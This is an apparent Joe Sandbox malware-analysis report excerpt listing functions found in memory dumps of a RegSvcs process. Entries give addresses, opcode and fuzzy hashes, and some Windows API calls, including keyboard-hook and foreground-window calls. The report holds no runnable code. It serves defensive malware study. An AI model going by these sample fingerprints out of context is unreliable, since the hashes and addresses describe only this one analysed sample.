Source File: 00000003.00000002.1170932869.00000000003E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_3e0000_RegSvcs.jbxd

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: f0002222e0b1643ad3510db8cda37e78e3dd84a0eaa748e275c8eab0b9180eaa
Instruction ID: 64191b601b6de887aa50bf8f151886b1049f6a0e0f0c1baa23786b923a209448
Opcode Fuzzy Hash: f0002222e0b1643ad3510db8cda37e78e3dd84a0eaa748e275c8eab0b9180eaa
Instruction Fuzzy Hash: 5031D2B1D10268DFCB11CF9AC884A9EBBF5BB49300F15812AE819AB394D770A905CF90

Uniqueness

Uniqueness Score: -1.00%

Function 003E63C8 Relevance: 1.6, APIs: 1, Instructions: 86fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNELBASE(00000000), ref: 003E6490

Memory Dump Source

Source File: 00000003.00000002.1170932869.00000000003E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_3e0000_RegSvcs.jbxd

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: 08511be9dbdc9bf4ec1734d34111d2e5b6ab7b77085bbcb7e3da8384bb1a2c45
Instruction ID: 1ce0dceb668d579d00697901d709ef8cdcfd4c448fbaa39ab38d4b702488ae6d
Opcode Fuzzy Hash: 08511be9dbdc9bf4ec1734d34111d2e5b6ab7b77085bbcb7e3da8384bb1a2c45
Instruction Fuzzy Hash: 9C31D171D086998FCB11CFAAD8057AEBBF0EF45310F15856AD448EB391E738A905CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 006E7FA8 Relevance: 1.6, APIs: 1, Instructions: 67COMMON

Download Yara Rule

APIs

K32EnumProcessModules.KERNEL32(?,00000000,?,?), ref: 006E8036

Memory Dump Source

Source File: 00000003.00000002.1171137641.00000000006E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6e0000_RegSvcs.jbxd

Similarity

API ID: EnumModulesProcess
String ID:
API String ID: 1082081703-0
Opcode ID: 054e1efe422c365723e8c648b44019d86c5fefae32765466c3eb3368bb445e80
Instruction ID: 6bcb6afbcad68f35f6c232d051c8e4167c7381e4cffac2aad805d6c5de2d6789
Opcode Fuzzy Hash: 054e1efe422c365723e8c648b44019d86c5fefae32765466c3eb3368bb445e80
Instruction Fuzzy Hash: BC2114B1D016599FCB40CFAAC885BDEFBB4FB49310F10852AE918B3340D3789954CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 006E7FB0 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

K32EnumProcessModules.KERNEL32(?,00000000,?,?), ref: 006E8036

Memory Dump Source

Source File: 00000003.00000002.1171137641.00000000006E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6e0000_RegSvcs.jbxd

Similarity

API ID: EnumModulesProcess
String ID:
API String ID: 1082081703-0
Opcode ID: 2d82201a83e4e7eb6847b5d708860c672703fa5fee3ff21ff8a583905a3cc1f4
Instruction ID: 5b75e751693ddd54765bba7ad6e4052f77745b08d8479409bcbeef5def500fa8
Opcode Fuzzy Hash: 2d82201a83e4e7eb6847b5d708860c672703fa5fee3ff21ff8a583905a3cc1f4
Instruction Fuzzy Hash: 992104B1D016199FCB00CF9AC885BDEFBB4FB49310F50852AE918B7340D778A954CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 003E2B18 Relevance: 1.6, APIs: 1, Instructions: 59fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNELBASE(00000000), ref: 003E6490

Memory Dump Source

Source File: 00000003.00000002.1170932869.00000000003E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_3e0000_RegSvcs.jbxd

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: c7e321ca681bca64a712e5f6f106eac3c907bec97f6794d1a76b3e7c635b11f1
Instruction ID: 25d205815cf1b776fa5ce77ffce8b3414aae578e9d61230a1448caf2df81ec99
Opcode Fuzzy Hash: c7e321ca681bca64a712e5f6f106eac3c907bec97f6794d1a76b3e7c635b11f1
Instruction Fuzzy Hash: C8213BB1D046699FCB10CF9AC44579EFBB4FF48310F15852AD818B7680D774A940CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 006E3768 Relevance: 1.6, APIs: 1, Instructions: 57COMMON

Download Yara Rule

APIs

SetWindowsHookExW.USER32(?,00000000,?,?), ref: 006E37E3

Memory Dump Source

Source File: 00000003.00000002.1171137641.00000000006E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6e0000_RegSvcs.jbxd

Similarity

API ID: HookWindows
String ID:
API String ID: 2559412058-0
Opcode ID: 0868755b1e113731259607bb0827a0a6ee3683fea83f230237095282b44fade4
Instruction ID: 371bc67c2a19254999925088c154e73c8fe2f42f325d4d3e1692dbdd104d4376
Opcode Fuzzy Hash: 0868755b1e113731259607bb0827a0a6ee3683fea83f230237095282b44fade4
Instruction Fuzzy Hash: 6D2115B59002598FCB10CF9AD848BDEBBF5FB88310F10842AD429A7350D774AA44CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 006E7688 Relevance: 1.5, APIs: 1, Instructions: 41COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 006E76E4

Memory Dump Source

Source File: 00000003.00000002.1171137641.00000000006E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6e0000_RegSvcs.jbxd

Similarity

API ID: ForegroundWindow
String ID:
API String ID: 2020703349-0
Opcode ID: 4fdf7139b864c275f50e48f2264555ea53e1e849f6511231f89f05fbaef570d6
Instruction ID: 6f406504d97eb477f581d51090b3d9ee2148c66d4af692f1fb43f08b7887f1f6
Opcode Fuzzy Hash: 4fdf7139b864c275f50e48f2264555ea53e1e849f6511231f89f05fbaef570d6
Instruction Fuzzy Hash: 6511E2B59047598FCB10CF9AD444BDEBBF4EB49314F20841AD529A7240D375AA44CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 006236FA Relevance: 1.3, Strings: 1, Instructions: 97COMMON

Download Yara Rule

Strings

h+U, xrefs: 006237F6

Memory Dump Source

Source File: 00000003.00000002.1171098845.0000000000620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_620000_RegSvcs.jbxd

Similarity

API ID:
String ID: h+U
API String ID: 0-3572767640
Opcode ID: da93079c0c116415712eb0b8c0a7c5513d7f17c0d30a39aaffa7f74adad4be79
Instruction ID: b48e4ce0800309f8d94c52d13ebb8c01ed12329066dd999cb66907fb5bf58432
Opcode Fuzzy Hash: da93079c0c116415712eb0b8c0a7c5513d7f17c0d30a39aaffa7f74adad4be79
Instruction Fuzzy Hash: 4131A434F002144FCB45ABB494646AEBBE3EF89325B118539E80ADB755EF34DD4ACB81

Uniqueness

Uniqueness Score: -1.00%

Function 006213D8 Relevance: .4, Instructions: 359COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1171098845.0000000000620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_620000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 454f9e18b5735acb826b33e3c2cd21ae9c7dc3dcd172667c80b6f251c4bf6765
Instruction ID: d27325e634e7e1c95520f0fe9e7f34140b755c3feda65823421861d1fb0af634
Opcode Fuzzy Hash: 454f9e18b5735acb826b33e3c2cd21ae9c7dc3dcd172667c80b6f251c4bf6765
Instruction Fuzzy Hash: 6CC1E134B082508FCB00AB74E868BBD7BE2AB86315F29812AE515DB7D1DF35CC45CB51

Uniqueness

Uniqueness Score: -1.00%

Function 0062E3F6 Relevance: .3, Instructions: 333COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1171098845.0000000000620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_620000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5d1531b1726ee99998cc817ce462b466e4bf3a6bd1ce3e2166f9d3163b64987e
Instruction ID: 99c8afc65505651bffe9c69870330ceba65a6abac7361bc0728e0152175cfce5
Opcode Fuzzy Hash: 5d1531b1726ee99998cc817ce462b466e4bf3a6bd1ce3e2166f9d3163b64987e
Instruction Fuzzy Hash: E1C16B30E006148FDB20DBA8E484BADBBF2EB55314F258576E419EB391DB36DC858B51

Uniqueness

Uniqueness Score: -1.00%

Function 006230E0 Relevance: .3, Instructions: 300COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1171098845.0000000000620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_620000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 307d9316e294fca9c7feae31c7ac6de19f96a639e8813a864f58c96ecd02263e
Instruction ID: c6f6d061704779055e6d6085b8de4c5b3073c5eced7ff2faeaa52522d47cb8a9
Opcode Fuzzy Hash: 307d9316e294fca9c7feae31c7ac6de19f96a639e8813a864f58c96ecd02263e
Instruction Fuzzy Hash: EEA1F330B047948FC711AB74E8597AE7BE2AF81304F15847AE446DB791EF39DD0A8B41

Uniqueness

Uniqueness Score: -1.00%

Function 00624470 Relevance: .2, Instructions: 229COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1171098845.0000000000620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_620000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2701c502df7c490bf0bf7cec8eec9e13478a55b02553cbfc144b6c075a0ee51e
Instruction ID: 704355e8c5d390993e314644b953377a9a078fa5ce89c0b16b300cb83bb2d669
Opcode Fuzzy Hash: 2701c502df7c490bf0bf7cec8eec9e13478a55b02553cbfc144b6c075a0ee51e
Instruction Fuzzy Hash: A3917B34E006688FCB14EFB0D854AADBBB6FF85345F208529D816AB754EF34A946CF44

Uniqueness

Uniqueness Score: -1.00%

Function 006240C8 Relevance: .2, Instructions: 220COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1171098845.0000000000620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_620000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bed0a7aa962cc9b8a51d37cd6424c81912d03af1c603738d24c8bb311b11252f
Instruction ID: 6350fd829a240a93b53a9adf110d69f1292bcf77a33901da8fc712a7e421d7fd
Opcode Fuzzy Hash: bed0a7aa962cc9b8a51d37cd6424c81912d03af1c603738d24c8bb311b11252f
Instruction Fuzzy Hash: 08717E35B006548FCB54EBB8D8587AE7BE3AFC8344F148429E506EB794EF749C468B81

Uniqueness

Uniqueness Score: -1.00%

Function 006240D8 Relevance: .2, Instructions: 219COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1171098845.0000000000620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_620000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 23de93632c5eb995835cc071089718a42139161eb72047b1be6a5518430a2d7b
Instruction ID: 82fb0d9aa1ca2c199ff4b23a7253c8ddc32558866057fdf987fadfece777d220
Opcode Fuzzy Hash: 23de93632c5eb995835cc071089718a42139161eb72047b1be6a5518430a2d7b
Instruction Fuzzy Hash: 24718E35B006148BCB54EBB8D8587AE77E3AFC8344F148429E906EB794EF74DC468B81

Uniqueness

Uniqueness Score: -1.00%

Function 00626668 Relevance: .2, Instructions: 201COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1171098845.0000000000620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_620000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 75a2188bf4b20a5635e4f5bea81512f6d29e768c7492c8de22b7c47f31c95b30
Instruction ID: 4872c991ae3009b92836154d7d12e19d1be2a2eced7b4a470cf9cadb030dfb5d
Opcode Fuzzy Hash: 75a2188bf4b20a5635e4f5bea81512f6d29e768c7492c8de22b7c47f31c95b30
Instruction Fuzzy Hash: 7E71F531B046548FDB149F28D44479DBBA3EF85304F28C1AAE4199F396DBB6CC458BA1

Uniqueness

Uniqueness Score: -1.00%

Function 00621CC0 Relevance: .2, Instructions: 192COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1171098845.0000000000620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_620000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 06bbbb157440c35b79a48661eaa56232de5dc7e97885efe3ec487e166c576aaf
Instruction ID: 5bc6df268a72eb5af1624881f55b4246214a4c8db1d80790a9e4b967a7699b9b
Opcode Fuzzy Hash: 06bbbb157440c35b79a48661eaa56232de5dc7e97885efe3ec487e166c576aaf
Instruction Fuzzy Hash: A561C130B043458FCB01EB74D855AAEBBF6AF86304F14896AE411DF396EF30E8058B91

Uniqueness

Uniqueness Score: -1.00%

Function 00622B48 Relevance: .2, Instructions: 158COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1171098845.0000000000620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_620000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: df226e7cc8fefee8d059eaa2bc4ca2e1c0544cddbab7eeb831e3f4169454e3ef
Instruction ID: 14c3048114a085a931f2609ffa694e1e25ab151c0fcdc5e98ea5974d1fb507a1
Opcode Fuzzy Hash: df226e7cc8fefee8d059eaa2bc4ca2e1c0544cddbab7eeb831e3f4169454e3ef
Instruction Fuzzy Hash: 79518C30B046548FCB14EBB4E855AADBBF3EF88319B118968D505EB758DF31EC458B90

Uniqueness

Uniqueness Score: -1.00%

Function 00621288 Relevance: .2, Instructions: 153COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1171098845.0000000000620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_620000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ecda7299ac39abef151a5b24fa0f3c58aae7fc2707bac79382d3cbff8a2f6f07
Instruction ID: 0a2e40e7613abdbebc07400e770a2d2b5a01e2518710e1164a3553bcb0bd03fe
Opcode Fuzzy Hash: ecda7299ac39abef151a5b24fa0f3c58aae7fc2707bac79382d3cbff8a2f6f07
Instruction Fuzzy Hash: 5551D12470D7C54FD3029774A825BAA7FE28BA3344F1981FAD148CF7D3EA24C8098B56

Uniqueness

Uniqueness Score: -1.00%

Function 00621D60 Relevance: .1, Instructions: 148COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1171098845.0000000000620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_620000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1d83d1e7227e828902857e0345dc0c56314e0560b5bded92d6f9393b6e4ef8aa
Instruction ID: 0f7d1c127e65a9eeefbe62874f2399fc7071b445ea03d3ca224931d7cbd2f485
Opcode Fuzzy Hash: 1d83d1e7227e828902857e0345dc0c56314e0560b5bded92d6f9393b6e4ef8aa
Instruction Fuzzy Hash: D051A270A002459FCB05EFB5D855AEEBBB6BF85304F148A29E512AF391DF30E805CB91

Uniqueness

Uniqueness Score: -1.00%

Function 0062C31F Relevance: .1, Instructions: 148COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1171098845.0000000000620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_620000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ace54034979900dd553e855c5a24e935e4df85ceaf09b73dfba08f24ab543d4f
Instruction ID: 7a1fbfd3467274459ec1c9537a294d9c35bad04762fce516208329b2ac812969
Opcode Fuzzy Hash: ace54034979900dd553e855c5a24e935e4df85ceaf09b73dfba08f24ab543d4f
Instruction Fuzzy Hash: 5C519F70A002148FCB14EB74E448BADBBF2AF88325F15C569D41AEB755DB35EC86CB81

Uniqueness

Uniqueness Score: -1.00%

Function 00625C70 Relevance: .1, Instructions: 133COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1171098845.0000000000620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_620000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9def6aa7b90a2d49b79bd4c7f56de64a301ca7692a7d85ae7bca7881861a155e
Instruction ID: c68a79fd221b53b37f8b0bcee88be1a22fc65e0098cc328ebd6a5abee8c0f594
Opcode Fuzzy Hash: 9def6aa7b90a2d49b79bd4c7f56de64a301ca7692a7d85ae7bca7881861a155e
Instruction Fuzzy Hash: 7441E170A047599FDB11CF69D845BEEBBF5EF89300F11816AE504EB382DB34A905CB91

Uniqueness

Uniqueness Score: -1.00%

Function 006223E9 Relevance: .1, Instructions: 127COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1171098845.0000000000620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_620000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f4c049d09d64e6bf7f4ccf36013cb12660c9a477744d8dd8d1b782649425996c
Instruction ID: e969819e6951d086771e0e4186cbb2624a2401782cb07f2440f66a8918a65832
Opcode Fuzzy Hash: f4c049d09d64e6bf7f4ccf36013cb12660c9a477744d8dd8d1b782649425996c
Instruction Fuzzy Hash: 54410735F046559FCB01DB78E854AEE7BF6EF88344F104065D905EB741EA34DC468B91

Uniqueness

Uniqueness Score: -1.00%

Function 00622448 Relevance: .1, Instructions: 93COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1171098845.0000000000620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_620000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dbeb5ab3f4f4f775aa8b5360cc017f96014fde7516a8b205643908c9afe184dd
Instruction ID: 3113d8eb6fa079442c05b4fd9fa3cf9800fd5cb7f1b8d111fd22cc9f89e677f3
Opcode Fuzzy Hash: dbeb5ab3f4f4f775aa8b5360cc017f96014fde7516a8b205643908c9afe184dd
Instruction Fuzzy Hash: 1331C431F002699FCF01ABB8D8646AE7BE6AF88354F118025E905EB340EF34DC418BA5

Uniqueness

Uniqueness Score: -1.00%

Function 00621870 Relevance: .1, Instructions: 87COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1171098845.0000000000620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_620000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 27622aef790bf8bfc48fc8d2b819ad4da22660fa87d1955a754bd6d42b873435
Instruction ID: e4a519e0bca01101113f12472d92968af3cff74cc7833b6c192dfd218d07a382
Opcode Fuzzy Hash: 27622aef790bf8bfc48fc8d2b819ad4da22660fa87d1955a754bd6d42b873435
Instruction Fuzzy Hash: E831EE30B082944FCB42DB74A85459E7BF2AF8A340B55816AD149EF792EB34DD06CB92

Uniqueness

Uniqueness Score: -1.00%

Function 006222C7 Relevance: .1, Instructions: 84COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1171098845.0000000000620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_620000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6f3e6eb95567b3ab4248c13652011c1f19df2d9e7eecc4f78671afd26049a553
Instruction ID: a5cc580fbbc9a3483d653cd986501f2bde5d7f526bd0c62c20e3f0adc412a027
Opcode Fuzzy Hash: 6f3e6eb95567b3ab4248c13652011c1f19df2d9e7eecc4f78671afd26049a553
Instruction Fuzzy Hash: 8A21AB30B046555FC742DB78E82169E7BF6AFC9700B508476E509EB391EF34AD06CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00622D71 Relevance: .1, Instructions: 83COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1171098845.0000000000620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_620000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2b050813c5253327d3514670bdb0840a00d5785639e76705a3398cdd4829bbe4
Instruction ID: 7fd9ae99a09fff8a64bfee43433e7408da6566078a3600034c01f92752c697c5
Opcode Fuzzy Hash: 2b050813c5253327d3514670bdb0840a00d5785639e76705a3398cdd4829bbe4
Instruction Fuzzy Hash: AD21EA30B042555FCB42DB78E824A9E7BF2AF89344B114176E518EB391EB30ED06CB92

Uniqueness

Uniqueness Score: -1.00%

Function 00622E90 Relevance: .1, Instructions: 82COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1171098845.0000000000620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_620000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 57e3eea2bc2698190c560ac30efbcd29bf362e77db0a7b5e4de97cda612bad55
Instruction ID: 710c9bfabc58cff0cc0f7720872ca9291bd30afd8800776000c8944f5b3c1e65
Opcode Fuzzy Hash: 57e3eea2bc2698190c560ac30efbcd29bf362e77db0a7b5e4de97cda612bad55
Instruction Fuzzy Hash: 4D21EA30B045559FCB42DB78E851AAE7BF2AFC9304F114169E109EB392EB34DC06CB51

Uniqueness

Uniqueness Score: -1.00%

Function 00622FB0 Relevance: .1, Instructions: 81COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1171098845.0000000000620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_620000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 21e41cb2927897b89ff5b5fc461de670fd72ebd030bc9e5f688bf0bdbc8df201
Instruction ID: 37a57d6b0b658f442fa339d4f659b5dd1d0f2c2189da8bf6952417fa2dbb5b0f
Opcode Fuzzy Hash: 21e41cb2927897b89ff5b5fc461de670fd72ebd030bc9e5f688bf0bdbc8df201
Instruction Fuzzy Hash: AF21D830B046559FC742EB78D854B9E7BF1AF89304F148169E109EB795EB34EC06CB92

Uniqueness

Uniqueness Score: -1.00%

Function 0062358D Relevance: .1, Instructions: 79COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1171098845.0000000000620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_620000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 998fba759b9bfea5f131925b8b3848e54a42358c075468075da536054e517653
Instruction ID: 4eba9d74d39c9e39a58b411eb5ccae16a4721fa3c2335a11366dd1fa5fd1a452
Opcode Fuzzy Hash: 998fba759b9bfea5f131925b8b3848e54a42358c075468075da536054e517653
Instruction Fuzzy Hash: 3A210870B041544FCB42EF78D855AAEBBF2AF89304B11857AE40DEB392EB34DD068B51

Uniqueness

Uniqueness Score: -1.00%

Function 0017D428 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1170743601.000000000017D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0017D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_17d000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 660a90687bbf6d9cf0b903ef1d60b66c3f75966a0e709cc81bfcdb5d2caf490e
Instruction ID: 42fb8a238f71132ab7805aa1a17382717581a0af3b19992b05dcd47eaed40039
Opcode Fuzzy Hash: 660a90687bbf6d9cf0b903ef1d60b66c3f75966a0e709cc81bfcdb5d2caf490e
Instruction Fuzzy Hash: 14210371504248DFDB15CF10E9C4B2ABF75FF98328F24C569E90A4B60AC336E856C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 00626838 Relevance: .1, Instructions: 73COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1171098845.0000000000620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_620000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f91fc689d78e89ea0deca23608b34a3bf36252c3ec0a61de8f22890e67d1cb6e
Instruction ID: 94a0a4ec8172aa02ef9d253e9b9ca688ad78573a7d7b62abd5cd86d563f3c771
Opcode Fuzzy Hash: f91fc689d78e89ea0deca23608b34a3bf36252c3ec0a61de8f22890e67d1cb6e
Instruction Fuzzy Hash: AD21BE30B00A248BDB049B28D914BAE76F7AF88714F208229F501EB3E0DB75DC048BA1

Uniqueness

Uniqueness Score: -1.00%

Function 001CE77C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1170772547.00000000001CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 001CD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1cd000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f1ab96be7a73c2f5e08e2a4f1be9c30669c561145936159f36cb8dc583410359
Instruction ID: 42a3f868982125b2c4a02c9dda47c35eede9e38bbd8f3ed515a4138524b709cd
Opcode Fuzzy Hash: f1ab96be7a73c2f5e08e2a4f1be9c30669c561145936159f36cb8dc583410359
Instruction Fuzzy Hash: 8E21F275604244DFDB14CF54D4C4F2ABFA5FB98718F24C56DE9094B246C73AD806CAA1

Uniqueness

Uniqueness Score: -1.00%

Function 001CE3F0 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1170772547.00000000001CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 001CD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1cd000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ff019f32fecadbe2bf0cab91e25d1df0c2edd2906d56dcc6c2584a95a5f61194
Instruction ID: b288015e41fcd57bb124c7e3b898a5c37f95331d6671e2bca1aedbfe154832aa
Opcode Fuzzy Hash: ff019f32fecadbe2bf0cab91e25d1df0c2edd2906d56dcc6c2584a95a5f61194
Instruction Fuzzy Hash: B121F575604244DFCB18CF10D884F2ABFA5FB94318F24C56DD9498B246C336D846CA61

Uniqueness

Uniqueness Score: -1.00%

Function 001CE4D8 Relevance: .1, Instructions: 71COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1170772547.00000000001CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 001CD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1cd000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a1a5c3ba554949a85d06c5e4b7be99aa17499ed2aed8bf1fb406808ae2e5cced
Instruction ID: 28aa96151ce6d7cbaee198651591925e51a4f9edc4e7997f042a97cc5ecb78b9
Opcode Fuzzy Hash: a1a5c3ba554949a85d06c5e4b7be99aa17499ed2aed8bf1fb406808ae2e5cced
Instruction Fuzzy Hash: 12213478608244DFDB04DF14D484F2ABFE5FB9831CF20C56CE8094B246D336D846C662

Uniqueness

Uniqueness Score: -1.00%

Function 0062440B Relevance: .1, Instructions: 71COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1171098845.0000000000620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_620000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fe69eaac95517072b524b4cf529719d9eb1cb6f17275a420b12e15195c11d7df
Instruction ID: ea33e835eeebcffdea10df719dad30be022e09be78c94e9bda0540d853570cfe
Opcode Fuzzy Hash: fe69eaac95517072b524b4cf529719d9eb1cb6f17275a420b12e15195c11d7df
